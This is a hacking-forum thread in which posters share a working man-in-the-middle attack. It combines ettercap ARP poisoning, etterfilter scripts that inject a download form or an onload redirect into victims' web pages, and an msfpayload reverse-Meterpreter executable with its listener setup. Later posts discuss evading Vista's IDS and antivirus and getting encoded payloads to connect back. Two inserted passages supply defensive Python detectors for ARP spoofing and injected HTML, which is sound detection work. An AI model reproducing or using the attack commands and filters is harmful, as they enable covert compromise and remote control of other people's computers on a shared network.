take a look at the filter, look at what is being replaced... it's sort of HTML injection on the fly
if anyone wants to see a quick video I can post one to give you a better idea
what I did was create a reverse meterpreter executable then hosted it on a server and did
some ARP poisoning with some HTML injection and you could use this to trick people into
downloading the .exe and get yourself a shell
this is just a proof of concept and I take no responsibility
html.filter
I think this is the working filter
Code:
if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "Accept-Encoding")) {
        replace("Accept-Encoding", "Accept-Nothing!");
    }
}
if (ip.proto == TCP && tcp.src == 80) {
    if (search(DATA.data, "<title>")) {
        replace("</title>", "</title><form action=\"http://192.168.1.6/meterpeter.exe\" method=\"link\"><img src=\"http://192.168.1.6/alert.gif\"><INPUT TYPE=submit value=\"DOWNLOAD meterpeter.exe\"></form><html><body><h10>just some instructions</h10></body></html>");
        msg("html injected");
    }
}
-create the meterpeter.exe-
(open msfconsole)
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=100 X > meterpeter.exe
Now place the executable into your Apache root directory
-set up your listener-
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.6
set LPORT 100
-execute ettercap-
etterfilter html.filter -o html.ef
ettercap -T -q -F html.ef -M ARP // //
now wait for someone on the network to download and execute meterpeter.exe and you will have a reverse shell
Let me know what you think
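From the defender's side, here is an added example (my code, not the poster's) that checks for the ARP poisoning step the post relies on (`ettercap ... -M ARP`). It parses tcpdump-style ARP reply lines and flags any IP, the gateway in particular, that is answered for by more than one MAC. The sample lines, IPs and MAC addresses are constructed for the example, and pinning the gateway's MAC is an assumption about what the monitoring host already knows.

```python
import re
from collections import defaultdict

# Matches tcpdump's ARP reply summary, e.g.
#   "ARP, Reply 192.168.1.1 is-at 00:11:22:33:44:01, length 28"
ARP_REPLY = re.compile(r"ARP, Reply (\d+\.\d+\.\d+\.\d+) is-at ([0-9a-fA-F:]{17})")

# Constructed sample capture (not real traffic): the gateway answers once,
# then a second host starts answering for the gateway's IP as well, which
# is what an ARP man-in-the-middle looks like on the wire.
SAMPLE_ARP_LINES = [
    "12:00:01.000000 ARP, Reply 192.168.1.1 is-at 00:11:22:33:44:01, length 28",
    "12:00:02.000000 ARP, Reply 192.168.1.20 is-at 00:11:22:33:44:20, length 28",
    "12:00:03.000000 ARP, Request who-has 192.168.1.1 tell 192.168.1.20, length 28",
    "12:00:04.000000 ARP, Reply 192.168.1.1 is-at 00:11:22:33:44:06, length 28",
    "12:00:05.000000 ARP, Reply 192.168.1.1 is-at 00:11:22:33:44:06, length 28",
]

# Assumed: the monitoring host knows the gateway's real MAC (constructed value).
PINNED_GATEWAY = {"192.168.1.1": "00:11:22:33:44:01"}


def parse_arp_replies(lines):
    """Yield (ip, mac) for every ARP reply line; requests and noise are ignored."""
    for line in lines:
        m = ARP_REPLY.search(line)
        if m:
            yield m.group(1), m.group(2).lower()


def find_arp_conflicts(lines, pinned=None):
    """Return one alert string per (ip, mac) pair that conflicts with what was
    seen before or with a pinned mapping.

    pinned: optional {ip: mac} for addresses whose MAC is known in advance;
    a reply for such an IP from any other MAC is flagged even if it is the
    first reply observed, which is the case when the rogue host answers first.
    """
    pinned = {ip: mac.lower() for ip, mac in (pinned or {}).items()}
    claimed = defaultdict(set)   # ip -> set of MACs that have answered for it
    reported = set()             # (ip, mac) pairs already alerted on
    alerts = []
    for ip, mac in parse_arp_replies(lines):
        if (ip, mac) in reported:
            continue
        if ip in pinned and mac != pinned[ip]:
            alerts.append(f"{ip} claimed by {mac}, pinned to {pinned[ip]}")
            reported.add((ip, mac))
        elif claimed[ip] and mac not in claimed[ip]:
            alerts.append(f"{ip} claimed by {mac}, previously by {sorted(claimed[ip])}")
            reported.add((ip, mac))
        claimed[ip].add(mac)
    return alerts


if __name__ == "__main__":
    for alert in find_arp_conflicts(SAMPLE_ARP_LINES, PINNED_GATEWAY):
        print("ALERT:", alert)
```

Without a pinned mapping the check only catches a change after the real gateway has been seen; with the mapping it also catches the case where the poisoned reply arrives before any legitimate one, so pinning the gateway is worth the small configuration effort.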
Quote: Let me know what you think
Nice, but you need a fair amount of social engineering
Don't eat yellow snow :rolleyes:
If I had skill in HTML, Java or PHP... the webpage would sell itself
maybe give me some suggestions
Code:
<form action="http://192.168.1.6/meterpeter.exe" method="link">
<img src="http://192.168.1.6/alert.gif">
<INPUT TYPE=submit value="DOWNLOAD meterpeter.exe">
</form><html><body><h10>just some instructions</h10></body></html>
Don't get me wrong, the idea is really nice. Unless you can't exploit some vulnerability you almost always depend on the user to click and/or download anything. Evilgrade is an exception to this.
Don't eat yellow snow :rolleyes:
http://www.infobyte.com.ar/demo/evilgrade.htm
wow this looks cool... I was not sure what Evilgrade was
I recently posted about this, it's in the newbie area under "Vista remote shell with phish". I have since perfected it... given a little time to work with it, but I have a filter (DNS wasn't working too well) that will redirect all traffic.
Thanks go out to hawaii67 for posting this filter some time ago, I'll try to find that post and put it in here later.
Try this as your filter. If the target machine already has a web page open, it will give an error "404"; after they attempt to refresh (or open another page) it will redirect to your HTTPD server.
#FILTER START#
if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "Accept-Encoding")) {
        replace("Accept-Encoding", "Accept-Rubbish!");
        msg("changed Accept-Encoding!\n");
    }
}
if (ip.proto == TCP && tcp.src == 80) {
    replace("<BODY", "<BODY onload=\"javascript:document.location.href='insert your site here'\"><XSS a=");
    replace("<body", "<body onload=\"javascript:document.location.href='insert your site here'\"><XSS a=");
    msg("Filter Ran.\n");
}
#FILTER END#
--EDIT--
This post doesn't allow script spacing, but I'm sure you'll get it. I also have the web pages built and yes they do SELL THEMSELVES. If anyone's interested send me a message or an email, and I'll send you a copy of what I have thus far. (I'm not sure if I can put them on here?)
And the original script was posted in a Backtrack 2.0 post entitled "ettercap filters", page 2 of the post, if anyone wants to read more about it.
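Both filters in this thread leave the same two fingerprints on the wire: the client's Accept-Encoding header is renamed (to "Accept-Nothing!" or "Accept-Rubbish!") so the server answers uncompressed, and the server's page comes back with content spliced in (a form posting to an .exe, or a `<body onload=...>` redirect followed by the `<XSS a=` attribute-swallowing trick). As an added example from the detection side, not code from either poster, here is a Python checker that runs those indicators over HTTP request headers and a response body. The request, the response page and the IP addresses in it are constructed for the example.

```python
import re

# Constructed sample traffic (not a capture from the thread): a request after
# the filter renamed its Accept-Encoding header, and a response page after the
# filter spliced in a download form and an onload redirect.
SAMPLE_REQUEST = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "Accept-Rubbish!: gzip, deflate\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "\r\n"
)
CLEAN_REQUEST = SAMPLE_REQUEST.replace("Accept-Rubbish!", "Accept-Encoding")

SAMPLE_RESPONSE_BODY = (
    "<html><head><title>Example</title>"
    '<form action="http://192.0.2.9/update.exe" method="link">'
    '<INPUT TYPE=submit value="DOWNLOAD update.exe"></form>'
    "<html><body><h10>just some instructions</h10></body></html></head>"
    "<body onload=\"javascript:document.location.href='http://192.0.2.9/'\"><XSS a= class=\"main\">"
    "<p>welcome</p></body></html>"
)
CLEAN_RESPONSE_BODY = (
    '<html><head><title>Example</title></head><body class="main"><p>welcome</p></body></html>'
)

# Request side: the filters replace the header *name*, so the encoding list
# survives under a name no browser sends. Flag any Accept-* header that is not
# one of the standard ones.
KNOWN_ACCEPT_HEADERS = {"accept", "accept-encoding", "accept-language", "accept-charset"}


def request_indicators(raw_request):
    """Return findings for a raw HTTP request; only the header block is examined."""
    findings = []
    header_block = raw_request.split("\r\n\r\n", 1)[0]
    for line in header_block.split("\r\n")[1:]:      # skip the request line
        if ":" not in line:
            continue
        name, value = (part.strip() for part in line.split(":", 1))
        if name.lower().startswith("accept-") and name.lower() not in KNOWN_ACCEPT_HEADERS:
            findings.append(f"non-standard header {name!r} carrying {value!r}")
    return findings


# Response side: markers of content spliced into a page in transit.
RESPONSE_PATTERNS = [
    (re.compile(r"<body[^>]*\bonload=[\"']?\s*javascript:\s*(?:document|window)\.location", re.I),
     "body onload redirect"),
    (re.compile(r"<xss\s+a=", re.I), "attribute-swallowing '<XSS a=' marker"),
    (re.compile(r"<form[^>]*\baction=[\"'][^\"']*\.exe[\"']", re.I), "form submitting to an .exe"),
]


def response_indicators(body):
    """Return findings for an HTML response body."""
    findings = [label for pattern, label in RESPONSE_PATTERNS if pattern.search(body)]
    # A second <html> element means a whole document was pasted into another one.
    if len(re.findall(r"<html\b", body, re.I)) > 1:
        findings.append("more than one <html> tag")
    return findings


if __name__ == "__main__":
    for finding in request_indicators(SAMPLE_REQUEST) + response_indicators(SAMPLE_RESPONSE_BODY):
        print("ALERT:", finding)
```

The header check is deliberately generic rather than matching the two strings from this thread, since the replacement name is whatever the filter author typed; what is constant is that a browser never sends an unknown Accept-* header with an encoding list as its value. The response checks are only meaningful on a monitoring point between the client and the poisoned gateway, since the server itself never sees the injected content.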
<P ALIGN=center><IFRAME SRC="http://server" WIDTH=300 HEIGHT=100></IFRAME></P>
this iframe has potential
and check out Irongeek's latest videos... bypass anti-vir fully undetected...
I watched the video. The problem with the normal way we both had going is that Vista's IDS picks it up (note that XP SP3 does not... it just runs); this may solve that problem. The normal way with meterpreter/reverse_http does not set off IDS, however it really doesn't work. I will play around with the code for the filter and with my setup and see if it gets past IDS. My money says it will. But I'll let you know.
Also I think you will find that Windows users have come to expect the OS asking them "do you want to?, do you really?, are you sure?, that's not such a good idea!, DO YOU REALLY!!!?".
lol, but again, give me a day or two to test some things and I'll get back to you.
have you tested this msfencode? http://metasploit.com/dev/trac/wiki/...ingMeterpreter
it's not working for me... I use the correct commands and check the ls -alrt and then I execute this payload on one of my computers but the exploit multi handler does not get a connection ? ? ? I'm stumped
I have tried it, I could not get it to work either; the only one that gives me a connection is the original script. There must be something in the EXE payload that's not running, I'm still playing with it.
The next step for me is to start troubleshooting by running a few pre-made exe files and see if ANY connect back. If not, I will see if I can't find out why. I think it has something to do with the way the payload is initiated. I'll start troubleshooting tomorrow.